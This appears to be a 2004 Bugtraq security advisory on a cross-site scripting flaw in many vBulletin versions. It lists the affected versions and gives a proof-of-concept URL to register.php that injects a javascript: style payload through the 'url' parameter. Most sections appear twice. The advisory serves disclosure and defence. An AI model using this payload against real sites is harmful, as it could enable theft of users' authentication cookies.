JelSoft VBulletin Cross-Site Scripting Vulnerability
BID:9649
Info
JelSoft VBulletin Cross-Site Scripting Vulnerability
| Bugtraq ID: | 9649 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 12 2004 12:00AM |
| Updated: | Feb 12 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to Jamie Fisher <[email protected]>. |
| Vulnerable: |
Jelsoft vBulletin 2.3.4 Jelsoft vBulletin 2.3.3 Jelsoft vBulletin 2.3 Jelsoft vBulletin 2.2.9 can Jelsoft vBulletin 2.2.8 Jelsoft vBulletin 2.2.7 Jelsoft vBulletin 2.2.6 Jelsoft vBulletin 2.2.5 Jelsoft vBulletin 2.2.4 Jelsoft vBulletin 2.2.3 Jelsoft vBulletin 2.2.2 Jelsoft vBulletin 2.2.1 Jelsoft vBulletin 2.2 .0 Jelsoft vBulletin 2.0.2 Jelsoft vBulletin 2.0.1 Jelsoft vBulletin 2.0 beta 3 Jelsoft vBulletin 2.0 beta 2 Jelsoft vBulletin 2.0 Jelsoft vBulletin 1.1.6 Jelsoft vBulletin 1.1 Jelsoft vBulletin 1.0 Lite |
| Not Vulnerable: | |
Discussion
JelSoft VBulletin Cross-Site Scripting Vulnerability
It has been reported that VBulletin is prone to a cross-site scripting vulnerability. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. Upon successful exploitation, this issue may allow for theft of cookie-based authentication credentials or other attacks.
It has been reported that VBulletin is prone to a cross-site scripting vulnerability. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. Upon successful exploitation, this issue may allow for theft of cookie-based authentication credentials or other attacks.
Exploit / POC
JelSoft VBulletin Cross-Site Scripting Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/forum/register.php?s=60b7ac47d0eba9853b6e36a3b18924bc&s=&do=register&url=AK%22%20style%3D%22background:url(javascript:alert(%27XSS%20Vulnerable%20To%20Cross%20Site%20Scripting%27))%22%20OS%22&month=0&day=0&year=0&who=adult&agree=1
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/forum/register.php?s=60b7ac47d0eba9853b6e36a3b18924bc&s=&do=register&url=AK%22%20style%3D%22background:url(javascript:alert(%27XSS%20Vulnerable%20To%20Cross%20Site%20Scripting%27))%22%20OS%22&month=0&day=0&year=0&who=adult&agree=1
Solution / Fix
JelSoft VBulletin Cross-Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
JelSoft VBulletin Cross-Site Scripting Vulnerability
References:
References:
- Vendor Homepage (Kyberna)
- VBulletin (Jamie Fisher